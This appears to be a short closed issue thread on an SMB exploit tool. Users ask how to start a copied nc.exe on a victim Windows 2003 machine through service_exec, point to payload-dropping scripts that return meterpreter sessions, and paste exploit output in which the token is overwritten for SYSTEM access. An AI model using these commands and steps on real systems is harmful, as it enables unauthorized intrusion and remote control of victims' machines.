Closed kalifan closed 7 years ago
i try in lan works fine, maybe in wan it does not work fine. maybe it is AV, i dont know.
No support issue
on the same note. I have copied nc.exe into Windows 2003 using python script. Now, I want to invoke nc.exe using service_exec(conn, r'cmd /c c:\nc.exe'). how do I go about that?
I also tried service_exec(conn, r'cmd /c c:\nc.exe c:\nc.exe
there are already new scripts for smb exploitation on the web that drop a payload to the victims and execute it , and then return a meterpreter session to you , witch is much more simple . Those scripts are based on this one here with a few changes , search it on github ,
the exploit it is working fine, but i dont understant how it work to completed the process and get a meterpreter session.
Target OS: Windows 5.1 Using named pipe: spoolss Groom packets attempt controlling next transaction on x86 success controlling one transaction modify parameter count to 0xffffffff to be able to write backward leak next transaction CONNECTION: 0x84927da8 SESSION: 0xe2b8b190 FLINK: 0x7bd48 InData: 0x7ae28 MID: 0xa TRANS1: 0x78b50 TRANS2: 0x7ac90 modify transaction struct for arbitrary read/write make this SMB session to be SYSTEM current TOKEN addr: 0xe3693030 userAndGroupCount: 0x3 userAndGroupsAddr: 0xe36930d0 overwriting token UserAndGroups creating file c:\pwned.txt on the target Done Someone can help me thanks.